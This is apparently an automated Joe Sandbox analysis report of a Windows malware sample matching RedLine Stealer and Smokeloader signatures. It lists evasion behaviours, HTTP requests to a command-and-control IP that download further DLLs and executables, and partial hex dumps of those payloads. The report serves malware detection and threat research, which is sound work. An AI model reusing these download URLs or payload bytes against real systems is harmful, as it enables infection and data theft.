Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574459
MD5:2e164f8eb316718ae1c48ed84e05dc9f
SHA1:653b1c1598a62782b58e52dd3f2c53355aad94fa
SHA256:323426e01a17e9974e2c710c0708a7232d250a2a7aa815ee7fdfac5f634af0e2
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2E164F8EB316718AE1C48ED84E05DC9F)
    • WerFault.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x10d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Antivirus detection for URL or domain
Source: http://80.82.65.70/dll/key;Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exeReversingLabs: Detection: 75%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B63817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B63817
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B7794E FindFirstFileExW,0_2_04B7794E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 09:49:13 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 09:49:15 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 80.82.65.70 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empW
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/downloadC
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key;
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyk
Source: file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyutils.dll
Source: file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/downloadA
Source: file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download21-573d1d5ce43f
Source: file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadA
Source: file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadvv
Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
